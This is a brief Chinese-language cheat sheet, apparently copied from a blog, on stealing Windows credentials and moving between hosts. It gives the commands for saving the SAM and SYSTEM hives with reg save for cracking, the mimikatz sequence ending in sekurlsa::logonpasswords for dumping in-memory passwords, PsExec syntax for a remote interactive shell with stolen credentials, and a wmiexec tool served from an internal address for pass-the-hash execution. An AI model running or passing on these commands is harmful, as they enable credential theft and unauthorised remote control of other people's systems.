使用 SAMInside 获取用户密码
- reg save hklm\sam C:/sam.hive
- reg save hklm\system C:/system.hive
用 cain 解密
或者复制 sam 到自己本机上然后再用
mimikatz 获取登陆过的账号密码
- mimikatz
- log
- privilege::debug
- sekurlsa::logonpasswords
在开启 smb 的情况下, 却没有 3389
在获取主机账号和密码的时候
PsExec.exe 可以获取一个交互式的 shell
psexec \\hostIp -u [username] -p [password] cmd
在没有密码只有 hash 的时候
http://192.168.11.66:8000/wmiexec.exe 可以执行命令, 一次执行一条命令
来源: http://www.bubuko.com/infodetail-3113316.html